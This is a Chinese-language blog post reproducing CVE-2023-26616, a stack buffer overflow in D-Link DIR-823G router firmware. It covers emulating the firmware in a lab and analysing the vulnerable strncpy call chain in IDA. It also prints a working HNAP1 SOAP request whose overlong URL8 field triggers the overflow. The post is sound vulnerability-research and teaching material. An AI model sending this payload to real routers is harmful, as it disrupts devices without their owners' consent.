D-link DIR-823G(CVE-2023-26616)漏洞复现

已于 2023-09-15 15:07:06 修改
阅读量333 收藏 1
点赞数
分类专栏: 路由器漏洞复现 文章标签: 智能路由器 物联网 网络
于 2023-09-15 14:57:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/The54No1/article/details/132901561
版权

漏洞信息

漏洞描述: D-Link DIR-823G firmware version 1.02B05 has a buffer overflow vulnerability, which originates from the URL field in SetParentsControlInfo.

漏洞复现

环境
• 虚拟机:AttifyOS3.0(Ubuntu18)
• 固件版本:D-Link DIR-823G firmware version 1.02B05
• 工具:IDA、binwalk、Firmadyne
步骤

  1. 固件仿真
    安装firmware-analysis-toolkit,运行fat.py进行固件仿真
./fat.py /home/iot/firmware/DIR823G_V1.0.2B05_20181207.bin#固件绝对路径

在这里插入图片描述
2. 仿真验证
按下Enter运行固件,输入192.168.0.1验证仿真。
在这里插入图片描述
3. 漏洞验证
本实验使用火狐浏览器对请求包进行编辑重发进行漏洞验证,也可用python脚本验证。
F12打开开发者选项,点击Network,选择一个/HNAP1数据包,点击Edit and Resend
在这里插入图片描述

<payload(http请求)>
SOAPAction: "http://purenetworks.com/HNAP1/SetParentsControlInfo"
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetParentsControlInfo xmlns="http://purenetworks.com/HNAP1/"><UsersInfo><HostName>1</HostName><Mac>1</Mac><IndexEnable>1</IndexEnable><StartTime>00:00:00</StartTime><EndTime>23:59:00</EndTime><Week>Sun</Week><UrlEnable>1</UrlEnable><URL1>cp.com</URL1><URL2></URL2><URL3></URL3><URL4></URL4><URL5></URL5><URL6></URL6><URL7></URL7><URL8>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</URL8><GroupId>1</GroupId></UsersInfo></SetParentsControlInfo></soap:Body></soap:Envelope>

只需编辑请求头中SOAPAction变量与请求体即可。
在这里插入图片描述
点击send即可完成漏洞验证。
在这里插入图片描述

漏洞分析

根据CVE漏洞描述来源SetParentsControlInfo中的URL变量,在固件中搜索SetParentsControlInfo,发现goahead文件,放入IDA中反汇编。
在这里插入图片描述

搜索URL字符串,查看引用函数。
在这里插入图片描述
对引用函数逐个查看发现栈溢出发生在sub_469F78函数。
在这里插入图片描述

分析发现栈溢出由于使用strncpy,V64-V71字符数组长度64,分别存储URL1-URL8,URL1-URL8的长度未进行限制,因此发生溢出。
在这里插入图片描述
在这里插入图片描述
由此函数反向确定程序调用链。main->sub_423F90->sub_42383C->(LOAD段)sub_46B6E8->sub_469F78
main函数调用sub_423F90,通过sub_423F90返回值进行判断。sub_423F90调用sub_42383C进行/HNAP1请求的处理。
在这里插入图片描述
sub_42383C调用off_588D80表中的内容进行比对,off_588D80表中存储的函数对应的动作,sub_46B6E8位于该表中。在这里插入图片描述
在这里插入图片描述
sub_46B6E8函数即为SetParentsControlInfo函数。
在这里插入图片描述
该漏洞通过请求头设置SetParentsControlInfo动作触发该调用链,造成栈溢出。

iot_vegetable_bird
关注
专栏目录
D-Link devinfo 信息泄露漏洞(CVE-2024-0717)
m0_50797689的博客
01-25 478
D-Link devinfo 信息泄露漏洞(CVE-2024-0717)
CVE-2019-2215
qq_37439229的博客
02-09 787
CVE-2019-2215 复现环境:android 10 kernel: Linux localhost 4.14.150+ arch:x86_64架构 exp只适用于x86(主要是在patch addr_limit上) 其他的架构要根据addr_limit在thread_info或是thread_struct的偏移修改. 漏洞简述 CVE-2019-2215是一个谷歌P0团队发现的与binder驱动相关的安卓内核UAF漏洞,配合内核信息泄漏可以实现任意地址读写,进而可以通过权限提升获取一个root
回味经典,踏入iot安全世界,DIR-815 多次溢出漏洞分析复现
蚁景网安学院
03-26 921
前言在进行IOT安全领域的学习和实践中,经典漏洞复现是必不可少的一环。本文将介绍一个经典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及对DIR-815路由器中多次溢出漏洞复现过程。固件下载地址:https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/这个漏洞属于经典范畴,很多人选择通过此漏洞进行...
IoT 移动应用漏洞利用
weixin_39368882的博客
03-06 809
IoT 移动应用漏洞利用(文末附《物联网渗透测试》下载链接) 导师某天又丢了一个整理好框架的 PPT,道“框架我已经帮你做好啦,你只需要实现每部分内容即可”,好吧接下去边查边做。 文章目录IoT 移动应用漏洞利用(文末附《物联网渗透测试》下载链接)前言一、简介二、获取 IoT 移动应用三、反编译 Android 应用1.引入库2.读入数据四、基于 MobSF 框架的静态分析五、Android 数据存储分析总结下载链接 前言 对于消费级以及部分商用 loT设备来说,通常都会提供与设备配套的移动应用来
Markovdecisionprocesses_Discretestochasticdynamicprogramming下载
luoganttcc的博客
09-09 697
链接 提取码 rnnw 大家下载吧,我花钱买的,方便大家
vivotek栈溢出漏洞复现
蚁景网安学院
07-08 801
近日公司进了一批摄像头,以前还没有做过这方面的研究所以找了一个vivotek 2017年的栈溢出漏洞拿来练练手。还是那个感觉,复现iot最难的步骤还是环境搭建...
IoT上的缓冲区溢出漏洞
我相信......
09-18 1796
在过去N年里,缓冲区溢出一直是网络攻击中最常被利用的漏洞。 看一下缓冲区是如何创建的,就能知道原因所在。 下面是C语言的一个例子: 第一步,程序员使用 malloc 函数并定义缓冲区内存的数量(例如32位) 第二步,返回指针,指示内存中缓冲区的开始位置 第三步,当程序员需要读取或写入该缓冲区时,程序员都会使用该指针 有了指针,程序员很容易忘记分配给指定缓冲区的实际内存量。编译器在程序中使...
IOT漏洞
内心不种满鲜花就会长满杂草
03-08 4072
IOT的安全问题
CVE-2019-16920】多款D-Link路由器的未授权RCE漏洞复现
Blog of Jaoing
04-22 2020
友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品......
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2252
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
The Story of 3 bugs that lead to Unauthorized RCE - Pascom Systems
m0_65876116的博客
10-21 521
【代码】The Story of 3 bugs that lead to Unauthorized RCE - Pascom Systems。
IoT 0 day漏洞启示
systemino的博客
04-24 690
有效的恶意软件常使用已知或者未知的漏洞来完成其主要功能。本文中介绍McAfee ATR提交的一个漏洞,并介绍一款利用多个相似漏洞的恶意软件。 McAfee ATR安全研究人员2018年5月21日就向Belkin提交了Belkin WeMo Insight智能插座中一个重要的远程代码执行漏洞,还提供了PoC和利用代码以及demo视频。厂商回应称已经准备好了补丁,会及时修复。但是截止8月21日厂商仍...
路由器漏洞挖掘之 DIR-850/645 命令执行漏洞复现
abc380620175的博客
06-10 1248
前言 这次来分析两个比较经典的路由器命令执行漏洞DIR-850 和 DIR-645 的 RCE,漏洞成因都是由于参数拼接不当造成的。 漏洞分析 根据前一篇文章中的任意文件读取漏洞,在读取到 DEVICE.ACCOUNT 配置文件中的敏感信息之后,我们就可以进一步利用,达到命令执行的目的,进而 getshell。 php 源代码 代码如下: 这里的 server 变量可控,导致在拼接时...
CVE-2020-13699漏洞复现
玄道的网安博客
09-18 857
简介 TeamViewer远程连接控制软件是一款随时随地连接到远程桌面电脑、移动设备及Iot,让远程连接过程更加的快速和安全,轻松实现对文件、网络及程序的实时支持或访问 影响版本 TeamViewer < 8.0.258861 TeamViewer < 9.0.28860 TeamViewer < 10.0.258873 TeamViewer < 11.0.258870 TeamViewer < 12.0.258869 TeamViewer < 13.2.3.
IOT漏洞挖掘入门
我想做一个好人<svg/onload=Alert`1`>(
06-01 1050
一日无聊,发现一篇文章 https://www.52pojie.cn/thread-367479-1-1.html 看评论是乌云 14年8月提交的漏洞。 于是进一步分析一下。 首先拿到 http://地址/.htpasswd admin:$1$$xAjuh7utDUp3xXVqThWzp/ 在hashcat中进行破解 Session..........: hashcat Status...........: Running Hash.Type........: md5crypt, .
iot安全入门:固件仿真操作(Sapido RB-1732路由器漏洞为例)
最新发布
m0_73575406的博客
09-06 1120
文章关于iot安全入门实操,选取例子是Sapido RB-1732路由器命令执行漏洞漏洞原理很简单,重点是熟悉工具使用以及漏洞复现流程pwd=8381。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 9000
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-46604复现学习
shierbai的博客
05-19 771
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 517
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今天,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
修复OpenSSL TLS 漏洞 CVE-2014-0160:升级到OpenSSL 1.0.1g
"修复OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160),升级至OpenSSL 1.0.1g,并更新OpenSSH和nginx" 在IT安全领域,漏洞管理是至关重要的,尤其是在涉及到关键服务如HTTPS时。OpenSSL是一个广泛应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值